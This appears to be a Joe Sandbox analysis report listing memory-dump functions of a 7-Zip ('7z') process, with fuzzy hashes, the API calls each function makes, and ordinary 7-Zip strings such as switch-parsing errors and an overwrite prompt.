                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                        • Instruction ID: 26ae10ae8dcbf0520e40c41bec9167e59d1b905bf7393e05a0154485052ebd90
                                                                                                                                                                                                        • Opcode Fuzzy Hash: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24F0972234B99085CA14FB32D5A576F67A1EBC7F82B0514E1AF4E63715CE28C40ACA04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                                                                                        • Instruction ID: a3756fcd3e6edb9717d5e4f53a602031902d5f6076ad998a88991be546ae6d44
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99F0972234B99045CA14FB32C49562F6791EBC7F82B0514E1AF4E63715CE28C40ACA04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                                                                                        • Instruction ID: 5d16a8a0095fde04dee85ff731f06404086aec1046458cc5816568e1312283d0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8EF0426235799585CA14BB36D46562F67A0FBC7F82B0124E1AF4E73725DE28C40ACA09
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                                                                                        • Instruction ID: aa48733aa47c05b7dac3b2618aaafe2d1ff4453d894f1052fd423d3f356f9b59
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36F0542235799485CA14BF32D46562F67A0EBC7F82B0164E1AF4E73725DE28C40ACA05
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$fputsmemset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 469995913-0
                                                                                                                                                                                                        • Opcode ID: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                                                                                        • Instruction ID: 43dae61f110d7b70c7dbbb04cc4edb25f8e07965e9ba23f2e265a983886ddaa1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AF09C23353D4081CB10FF31D89162E23A1E7C3B69B0452E1AF6D673A9CE20C44ACA44
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmovewcscmp
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3584677832-0
                                                                                                                                                                                                        • Opcode ID: 8f07c27319cfa5f95388e6e979af598d2aca2aeda731ef0214d5af31e1e2fbd3
                                                                                                                                                                                                        • Instruction ID: 360f8aeeb57547607af4af7bd19ef14f66f675d85b44a27b9f1f5c872739016b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f07c27319cfa5f95388e6e979af598d2aca2aeda731ef0214d5af31e1e2fbd3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF518E73201E8486CB20EF1AD49016D77E1F3A4B99B54C1A6DF6D4BB68DF35D98AC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                                                                                                                                                                                                        • API String ID: 1294909896-2104980125
                                                                                                                                                                                                        • Opcode ID: e608d69ddf76c65373c44b70f7ae3aeb3f136de1000bdcda8d63e8efa4483270
                                                                                                                                                                                                        • Instruction ID: be64f92b12f74d534ec5c964272c0e16e8113aef99d2b3cb5ef9bbd711d616bc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e608d69ddf76c65373c44b70f7ae3aeb3f136de1000bdcda8d63e8efa4483270
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D51D372215590A6CF21EF28E4803AD37E1F392396F449AE1DF5A47745EB74C98DCB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • free.MSVCRT ref: 00B604EE
                                                                                                                                                                                                          • Part of subcall function 00B5FEC8: _CxxThrowException.MSVCRT ref: 00B5FF2F
                                                                                                                                                                                                          • Part of subcall function 00B5FEC8: free.MSVCRT ref: 00B5FFAE
                                                                                                                                                                                                          • Part of subcall function 00B5FEC8: _CxxThrowException.MSVCRT ref: 00B5FFD1
                                                                                                                                                                                                          • Part of subcall function 00B5FEC8: _CxxThrowException.MSVCRT ref: 00B5FFF7
                                                                                                                                                                                                          • Part of subcall function 00B5FEC8: _CxxThrowException.MSVCRT ref: 00B6002B
                                                                                                                                                                                                        • free.MSVCRT ref: 00B60523
                                                                                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00B60564
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionThrow$free
                                                                                                                                                                                                        • String ID: Incorrect wildcard type marker$Too short switch
                                                                                                                                                                                                        • API String ID: 3129652135-1817034180
                                                                                                                                                                                                        • Opcode ID: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                                                                                        • Instruction ID: ba6bacbb581c4dc209268822080be018565929f109f0eb44a8c2991a302be63e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C51C2232286C485CB30EB16E4917AFBBB0F395B94F548196EF8A17B55DB3CC586CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID: #
                                                                                                                                                                                                        • API String ID: 1534225298-1885708031
                                                                                                                                                                                                        • Opcode ID: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                                                                                        • Instruction ID: be480be8004143ab372e9e80aedd920986b3a3dedcd4817df2355c668e8a8f88
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C516026315B8482CB61DB26E4807AE77A1F7C9B90F584291EFAE477A5DF38C849C700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: memsetstrlen$fputs
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2256168112-2735817509
                                                                                                                                                                                                        • Opcode ID: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                                                                                                                                                        • Instruction ID: 7299efb7d79196b37de4bff3a83064bda1c7285002c4eba0d949ac3e2c8f3f84
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C041C4667087C0A5CF34EB25E8913AE67E1F784BC8F4855B6DE8A07719CE78C589CB40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorLastfree
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2167247754-0
                                                                                                                                                                                                        • Opcode ID: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                                                                                                                                                        • Instruction ID: a9c2a571b0bbf0d2d38903707ef1d96ee60a0af96fb4dc5a8939e0816f59cca3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8141B922219680C5DA20EB14E4913AEB3E1F7D2761F5012E6EFDD83AD5DF28C94ECB04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$FileMove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 288606353-0
                                                                                                                                                                                                        • Opcode ID: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                                                                                                                                                        • Instruction ID: 2e311e304759a7686ca8e403c7d1d5447314e35939a72e90f1fd78e26be671ab
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3311961334594045CA20EF25E85076B77A0DBC3BD2F8852E1BF6AA7765DE29CC8ECA00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B5794C: FindClose.KERNELBASE ref: 00B5795E
                                                                                                                                                                                                        • SetLastError.KERNEL32 ref: 00B57BAA
                                                                                                                                                                                                        • SetLastError.KERNEL32 ref: 00B57BB9
                                                                                                                                                                                                        • FindFirstStreamW.KERNELBASE ref: 00B57BDB
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00B57BEA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorLast$Find$CloseFirstStream
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4071060300-0
                                                                                                                                                                                                        • Opcode ID: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                                                                                                                                                                                        • Instruction ID: d14e444c2776221517db9027e0731cefbd59eff7cd3e4ddaca6e397c3b734ea1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D219522748B4086DA20AB25F45436933E1FB8A776F5453E1DEBA437E5DF38C94DC601
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 00B9CD2A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputsfree
                                                                                                                                                                                                        • String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
                                                                                                                                                                                                        • API String ID: 2581285248-171671738
                                                                                                                                                                                                        • Opcode ID: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                                                                                                                                                        • Instruction ID: 8b442c650a373b5536fd1db01fc88e49a6e1a25f8fef7e8406a817fbd89a59da
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F31B32220894497EF309B14D8A537A2FE1E7853E5F4851B2EF4B073AACB5CDCA5D701
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                                                                                        • Opcode ID: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
                                                                                                                                                                                                        • Instruction ID: 2fedd4228e07c213332ac0863769e5d8f62e60c214fad444ab01f790b5747ac5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB21A42331694051CA61EF24E85135EA7A0EBC2BD2F4452E1BF5E577A9DF29CA4ECB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$fputc
                                                                                                                                                                                                        • String ID: Time =
                                                                                                                                                                                                        • API String ID: 1185151155-458291097
                                                                                                                                                                                                        • Opcode ID: 16a4f377ae2496a292c66f8ada87fd246b35ce43fff94a3fe0e30452b0aef1ee
                                                                                                                                                                                                        • Instruction ID: bd44192d7c2fa132f8c6e32fba5c9d3fb145d792cdb8f27c5dc775abf31676af
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16a4f377ae2496a292c66f8ada87fd246b35ce43fff94a3fe0e30452b0aef1ee
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB219095340A1586EA08AF1AE89136A6352E7A8FC4F08E035DE1A477A9DF3CC896C340
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CriticalSectionfreememmove$EnterExceptionLeaveThrow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 202075352-0
                                                                                                                                                                                                        • Opcode ID: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                                                                                        • Instruction ID: 8bdc9838de30910cdc0bf917e8c16ad2e0cccb31470001a84c76c317fb8e402c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63219D77221A5587DB60EF2AD44166C7360F345BA5F901366AE3A176A8DF25C886CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
